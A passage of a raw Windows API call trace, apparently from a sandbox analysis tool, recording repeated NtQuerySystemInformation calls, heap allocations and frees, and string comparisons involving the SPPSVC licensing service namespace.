NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0274.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0274.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0274.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x20, ResultLength=0x0) [0274.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x20, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x28, ResultLength=0x0) [0274.502] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0274.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0274.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0274.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0274.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x28, ResultLength=0x0) [0274.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0274.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0274.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0274.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x20, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x20, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9c0, Length=0x20, ResultLength=0x0) [0274.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.515] GetProcessHeap () returned 0x2026c630000 [0274.515] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8081c0 [0274.515] GetProcessHeap () returned 0x2026c630000 [0274.515] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d77d0 [0274.516] GetProcessHeap () returned 0x2026c630000 [0274.516] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfe) returned 0x2026c692330 [0274.517] GetProcessHeap () returned 0x2026c630000 [0274.517] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x108) returned 0x2026c691de0 [0274.518] GetProcessHeap () returned 0x2026c630000 [0274.518] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8843b0 [0274.518] GetProcessHeap () returned 0x2026c630000 [0274.518] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x110) returned 0x2026d7330e0 [0274.518] GetProcessHeap () returned 0x2026c630000 [0274.518] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806bc0 [0274.518] GetProcessHeap () returned 0x2026c630000 [0274.518] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7990 [0274.518] GetProcessHeap () returned 0x2026c630000 [0274.518] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7326c0 | out: hHeap=0x2026c630000) returned 1 [0274.518] GetProcessHeap () returned 0x2026c630000 [0274.518] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1c4) returned 0x2026d2427e0 [0274.519] GetProcessHeap () returned 0x2026c630000 [0274.519] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c692bb0 [0274.519] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfde08 | out: phModule=0xc751dfde08*=0x7ffcea380000) returned 1 [0274.519] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0274.519] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdf30, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdf30, ResultLength=0x0) returned 0x0 [0274.520] GetProcessHeap () returned 0x2026c630000 [0274.520] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884570 [0274.520] GetProcessHeap () returned 0x2026c630000 [0274.520] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d78e550 [0274.520] GetProcessHeap () returned 0x2026c630000 [0274.520] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806a60 [0274.520] GetProcessHeap () returned 0x2026c630000 [0274.520] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7960 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d884e30 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c691de0 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7330e0 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806bc0 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7990 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8843b0 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2427e0 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692bb0 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e550 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806a60 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7960 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884570 | out: hHeap=0x2026c630000) returned 1 [0274.521] GetProcessHeap () returned 0x2026c630000 [0274.521] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e5f0 | out: hHeap=0x2026c630000) returned 1 [0274.522] GetProcessHeap () returned 0x2026c630000 [0274.522] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692330 | out: hHeap=0x2026c630000) returned 1 [0274.522] GetProcessHeap () returned 0x2026c630000 [0274.522] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884e30 | out: hHeap=0x2026c630000) returned 1 [0274.522] GetProcessHeap () returned 0x2026c630000 [0274.522] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8081c0 | out: hHeap=0x2026c630000) returned 1 [0274.522] GetProcessHeap () returned 0x2026c630000 [0274.522] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d77d0 | out: hHeap=0x2026c630000) returned 1 [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x20, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x50, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x28, ResultLength=0x0) [0274.523] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x50, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x50, ResultLength=0x0) [0274.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x50, ResultLength=0x0) [0274.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x38, ResultLength=0x0) [0274.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x28, ResultLength=0x0) [0274.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x28, ResultLength=0x0) [0274.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x28, ResultLength=0x0) [0274.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x28, ResultLength=0x0) [0274.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x38, ResultLength=0x0) [0274.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x28, ResultLength=0x0) [0274.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x28, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x20, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x20, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x38, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x38, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x20, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x20, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x20, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfded0, Length=0x28, ResultLength=0x0) [0274.535] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0274.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf50, Length=0x50, ResultLength=0x0) [0274.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0274.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x28, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde80, Length=0x38, ResultLength=0x0) [0274.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x28, ResultLength=0x0) [0274.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.543] NtQuerySystemInformation 